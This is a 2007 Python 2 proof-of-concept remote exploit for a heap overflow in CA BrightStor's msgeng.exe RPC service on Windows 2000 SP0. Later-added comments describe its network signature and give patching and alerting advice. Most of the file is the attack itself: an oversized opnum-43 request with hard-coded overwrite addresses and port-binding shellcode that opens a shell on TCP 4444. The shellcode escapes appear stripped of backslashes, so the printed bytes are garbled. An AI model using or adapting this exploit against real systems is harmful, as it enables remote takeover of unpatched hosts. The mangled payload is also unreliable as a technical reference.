
MsgEng.py.txt

Posted on 29 January 2007

#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
#
# NOTE(review): this is a 2007 proof-of-concept against Windows 2000 SP0. The
# two hard-coded addresses below are specific to that build and the script is
# Python 2 (print statement). It is kept here as an artefact of the advisory
# above; the annotations added below describe what it sends so that the
# traffic can be recognised and the exposed service protected.

from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys

def DCEconnectAndExploit(target):
    """Send one oversized request to the msgeng RPC interface on *target*.

    Opens impacket's TCPTransport to TCP port 6503, binds to interface
    dc246bf0-7a7a-11ce-9f88-00805fe43838 version 1.0 and issues opnum 43
    with a 676-byte filler followed by the two addresses and the payload
    described in the header comment. Nothing is read back; the function
    returns None once dce.call has been issued, and any transport or bind
    error propagates as an impacket exception.

    Defender notes: on the wire this is a DCE/RPC bind to the interface UUID
    above followed by an opnum-43 request several hundred bytes long; a bind
    to that UUID from an unexpected source, or a new listener on TCP 4444 on
    a BrightStor host, is worth alerting on. The remedy is the vendor update
    for the referenced advisory; restricting reachability of TCP 6503 limits
    exposure until it is applied.
    """
    trans = transport.TCPTransport(target, 6503)
    trans.connect()
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
    # 676 bytes of filler precede the two addresses that follow.
    request = "A" * 676
    request += "x90x90x90x90"
    request += "x90x90xebx0a"
    #Call dword ptr [esi +4C] from user32.dll
    request += struct.pack("<L", 0x77E4FB7A)
    #Overwrite UnhandledExceptionFilter in Windows 2000 SP0
    request += struct.pack("<L", 0x77EE044C)
    request += "x90x90x90x90" * 2
    #Portbinding shellcode; Opens shell on TCP port 4444
    request += "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe0"
    request += "x6fxe3x2ax83xebxfcxe2xf4x1cx05x08x67x08x96x1cxd5"
    request += "x1fx0fx68x46xc4x4bx68x6fxdcxe4x9fx2fx98x6ex0cxa1"
    request += "xafx77x68x75xc0x6ex08x63x6bx5bx68x2bx0ex5ex23xb3"
    request += "x4cxebx23x5exe7xaex29x27xe1xadx08xdexdbx3bxc7x02"
    request += "x95x8ax68x75xc4x6ex08x4cx6bx63xa8xa1xbfx73xe2xc1"
    request += "xe3x43x68xa3x8cx4bxffx4bx23x5ex38x4ex6bx2cxd3xa1"
    request += "xa0x63x68x5axfcxc2x68x6axe8x31x8bxa4xaex61x0fx7a"
    request += "x1fxb9x85x79x86x07xd0x18x88x18x90x18xbfx3bx1cxfa"
    request += "x88xa4x0exd6xdbx3fx1cxfcxbfxe6x06x4cx61x82xebx28"
    request += "xb5x05xe1xd5x30x07x3ax23x15xc2xb4xd5x36x3cxb0x79"
    request += "xb3x3cxa0x79xa3x3cx1cxfax86x07xf2x76x86x3cx6axcb"
    request += "x75x07x47x30x90xa8xb4xd5x36x05xf3x7bxb5x90x33x42"
    request += "x44xc2xcdxc3xb7x90x35x79xb5x90x33x42x05x26x65x63"
    request += "xb7x90x35x7axb4x3bxb6xd5x30xfcx8bxcdx99xa9x9ax7d"
    request += "x1fxb9xb6xd5x30x09x89x4ex86x07x80x47x69x8ax89x7a"
    request += "xb9x46x2fxa3x07x05xa7xa3x02x5ex23xd9x4ax91xa1x07"
    request += "x1ex2dxcfxb9x6dx15xdbx81x4bxc4x8bx58x1exdcxf5xd5"
    request += "x95x2bx1cxfcxbbx38xb1x7bxb1x3ex89x2bxb1x3exb6x7b"
    request += "x1fxbfx8bx87x39x6ax2dx79x1fxb9x89xd5x1fx58x1cxfa"
    request += "x6bx38x1fxa9x24x0bx1cxfcxb2x90x33x42x10xe5xe7x75"
    request += "xb3x90x35xd5x30x6fxe3x2a"
    # Opnum 43 on the bound interface; the response, if any, is not read.
    dce.call(43, request)

# Entry point: the only argument is the target address. It is checked for
# presence only, not for being a valid IP or hostname.
if __name__ == '__main__':
    try:
        target = sys.argv[1]
    except IndexError:
        # Python 2 print statement; the script predates Python 3.
        print 'Usage: %s <target ip> ' % sys.argv[0]
        sys.exit(-1)
    DCEconnectAndExploit(target)

 
